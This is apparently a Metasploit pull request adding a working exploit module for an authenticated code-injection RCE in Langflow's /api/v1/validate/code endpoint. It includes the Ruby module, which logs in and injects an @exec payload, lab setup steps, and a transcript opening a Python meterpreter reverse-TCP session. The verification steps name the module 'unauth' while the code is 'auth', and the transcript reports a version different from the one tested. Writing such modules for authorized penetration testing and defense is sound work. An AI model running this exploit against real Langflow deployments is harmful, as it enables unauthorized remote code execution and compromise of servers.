### PR TITLE
ENH: Exploit module for Langflow authenticated Remote Code Execution vulnerability CVE-2026-7873

### DIFF
--- a/documentation/modules/exploit/multi/http/langflow_auth_rce_cve_2026_7873.md
+++ b/documentation/modules/exploit/multi/http/langflow_auth_rce_cve_2026_7873.md
@@ -1,0 +1,61 @@
+## Vulnerable Application
+
+Langflow versions 1.0.0 through 1.10.0 are susceptible to authenticated remote code
+execution due to improper validation of code in the `/api/v1/validate/code` endpoint.
+
+The vulnerability affects:
+
+    * Langflow 1.0.0 through 1.10.0
+
+
+This module was successfully tested on:
+
+    * Langflow 1.8.4
+
+
+### Installation
+1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
+2. Install Ubuntu Linux (or other Linux distro) in your virtualization engine.
+3. Pull pre-built Langflow docker container (v1.8.4) in your VM.
+   `docker pull langflowai/langflow:1.8.4`
+4. Start the langflow container.
+
+
+```
+sudo docker run -d \
+  --name langflow \
+  -p 192.168.1.30:7860:7860 \
+  langflowai/langflow:1.8.4
+```
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/multi/http/langflow_unauth_rce_cve_2026_7873`
+4. Do: `run lhost=<lhost> rhost=<rhost>`
+5. You should get a meterpreter
+
+
+## Options
+
+
+## Scenarios
+```
+msf > use multi/http/langflow_auth_rce_cve_2026_7873
+[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
+msf exploit(multi/http/langflow_auth_rce_cve_2026_7873) > set RHOSTS 192.168.1.30
+RHOSTS => 192.168.1.30
+msf exploit(multi/http/langflow_auth_rce_cve_2026_7873) > set USERNAME root
+USERNAME => root
+msf exploit(multi/http/langflow_auth_rce_cve_2026_7873) > set PASSWORD root
+PASSWORD => root
+msf exploit(multi/http/langflow_auth_rce_cve_2026_7873) > exploit
+[*] Started reverse TCP handler on 192.168.1.30:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 1.9.0 detected, which appears vulnerable.
+[*] Sending stage (34544 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (192.168.1.30:4444 -> 172.17.0.2:59826) at 2026-09-04 23:56:37 -0400
+
+meterpreter >
+```

--- a/documentation/modules/exploit/multi/http/langflow_auth_rce_cve_2026_7873.md
+++ b/documentation/modules/exploit/multi/http/langflow_auth_rce_cve_2026_7873.md
@@ -3,6 +3,8 @@
 Langflow versions 1.0.0 through 1.10.0 are susceptible to authenticated remote code
 execution due to improper validation of code in the `/api/v1/validate/code` endpoint.
 
+Arbitrary code is executed under the context of the backend Langflow process.
+
 The vulnerability affects:
 
     * Langflow 1.0.0 through 1.10.0

--- a/modules/exploits/multi/http/langflow_auth_rce_cve_2026_7873.rb
+++ b/modules/exploits/multi/http/langflow_auth_rce_cve_2026_7873.rb
@@ -1,0 +1,146 @@
+# frozen_string_literal: true
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Langflow AI authenticated RCE',
+        'Description' => %q{
+          Langflow versions 1.0.0 through 1.10.0 are susceptible to authenticated remote code
+          execution due to improper validation of code in the `/api/v1/validate/code` endpoint.
+        },
+        'Author' => [
+          'Richard Howe <rhowe425>'
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2026-7873'],
+          ['URL', 'https://www.ibm.com/support/pages/node/7278441']
+        ],
+        'Targets' => [
+          [
+            'Python payload',
+            {
+              'Platform' => 'python',
+              'Arch' => ARCH_PYTHON
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Payload' => {
+          'BadChars' => '"'
+        },
+        'DisclosureDate' => '2026-09-04',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(7860),
+        OptString.new(
+          'TARGETURI',
+          [true, 'Base path of the Langflow application', '/']
+        ),
+        OptString.new(
+          'USERNAME',
+          [true, 'LANGFLOW USERNAME', '']
+        ),
+        OptString.new(
+          'PASSWORD',
+          [true, 'LANGFLOW PASSWORD', '']
+        )
+      ]
+    )
+  end
+
+  def get_token(username, password)
+    data = {
+      'username' => username,
+      'password' => password
+    }
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api/v1/login'),
+      'vars_post' => data
+    )
+
+    return unless res&.code&.between?(200, 299)
+
+    json = res.get_json_document
+    return unless json.is_a?(Hash)
+
+    json['access_token']
+  end
+
+  def check
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'api/v1/version')
+      }
+    )
+
+    return Exploit::CheckCode::Unknown('Unexpected server reply.') unless res&.code == 200
+
+    doc = res.get_json_document
+    version_str = doc.is_a?(Hash) ? doc['version'] : nil
+    return Exploit::CheckCode::Unknown('Failed to parse version.') unless version_str
+
+    package = doc.is_a?(Hash) ? doc['package'] : nil
+    return Exploit::CheckCode::Unknown('Failed to identify application.') unless package
+    return Exploit::CheckCode::Safe('Application is not Langflow.') unless package.to_s.downcase == 'langflow'
+
+    version = Rex::Version.new(version_str.to_s)
+    return Exploit::CheckCode::Unknown('Failed to parse version.') unless version
+
+    # Vulnerable version of Langflow
+    if (version >= Rex::Version.new('1.0.0')) && (version <= Rex::Version.new('1.10.0'))
+      return Exploit::CheckCode::Appears(
+        "Version #{version} detected, which appears vulnerable."
+      )
+    end
+
+    # Patched version of Langflow
+    Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable.")
+  end
+
+  def exploit
+    @token = get_token(datastore['USERNAME'], datastore['PASSWORD'])
+
+    if @token.to_s.empty?
+      fail_with(Failure::UnexpectedReply, 'Could not authenticate with Langflow API.')
+    end
+
+    res = send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'api/v1/validate/code'),
+        'headers' => {
+          'Content-Type' => 'application/json',
+          'Authorization' => "Bearer #{@token}"
+        },
+        'data' => {
+          'code' => "@exec(\"#{payload.encode}\")\ndef #{rand_text_alpha(6)}():\n    pass"
+        }.to_json
+      }
+    )
+    fail_with(Failure::Unknown, 'Unexpected server reply.') unless res&.code == 200
+  end
+end

--- a/modules/exploits/multi/http/langflow_auth_rce_cve_2026_7873.rb
+++ b/modules/exploits/multi/http/langflow_auth_rce_cve_2026_7873.rb
@@ -1,5 +1,3 @@
-# frozen_string_literal: true
-
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
@@ -15,10 +13,12 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Langflow AI authenticated RCE',
+        'Name' => 'Langflow AI Code Validation Authenticated RCE',
         'Description' => %q{
           Langflow versions 1.0.0 through 1.10.0 are susceptible to authenticated remote code
           execution due to improper validation of code in the `/api/v1/validate/code` endpoint.
+
+          Arbitrary code is executed under the context of the backend Langflow process.
         },
         'Author' => [
           'Richard Howe <rhowe425>'
@@ -38,6 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ]
         ],
         'DefaultTarget' => 0,
+        'DefaultOptions' => { 'RPORT' => 7860 },
         'Payload' => {
           'BadChars' => '"'
         },
@@ -52,7 +53,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        Opt::RPORT(7860),
         OptString.new(
           'TARGETURI',
           [true, 'Base path of the Langflow application', '/']
@@ -122,7 +122,9 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    @token = get_token(datastore['USERNAME'], datastore['PASSWORD'])
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+    @token = get_token(username, password)
 
     if @token.to_s.empty?
       fail_with(Failure::UnexpectedReply, 'Could not authenticate with Langflow API.')


### PR DESCRIPTION
## Description
This pull request adds a new exploit module that detects and exploits an authenticated remote code execution vulnerability impacting Langflow versions 1.0.0 through 1.10.0


**Related Issue:** 
Fixes #21876   

## Breaking Changes
None

## Reviewer Notes


## Verification Steps
1. `docker pull` and `docker run` langflow, per documentation
2. Start msfconsole
3. Do: `use exploit/multi/http/langflow_unauth_rce_cve_2026_7873`
4. Do: `set rhosts=<rhost> username=<username> password=<password>`
5. Do: `exploit`
6. You should get a meterpreter session



## Test Evidence
<img width="816" height="277" alt="image" src="https://github.com/user-attachments/assets/996312d0-f0b7-473a-9729-82fb2fe9fa21" />



## Environment

| Field | Details |
|-------|---------|
| **Operating System** |  Ubuntu 22.04 |
| **Target Software/Hardware** | langflow 1.8.4 |
| **Docker Image / Vagrant Setup** | langflowai/langflow:1.8.4 |

## AI Usage Disclosure
None


## Pre-Submission Checklist

- [X] Included a corresponding documentation markdown file in `documentation/modules` _(new modules only)_
- [X] No sensitive information (IP addresses, credentials, API keys, hashes) in code or documentation
- [X] Tested on the target environment specified in the Environment section above
- [X] Included RSpec tests for library changes _(encouraged for `lib/` changes)_
- [X] Read the [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and [module acceptance guidelines](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html)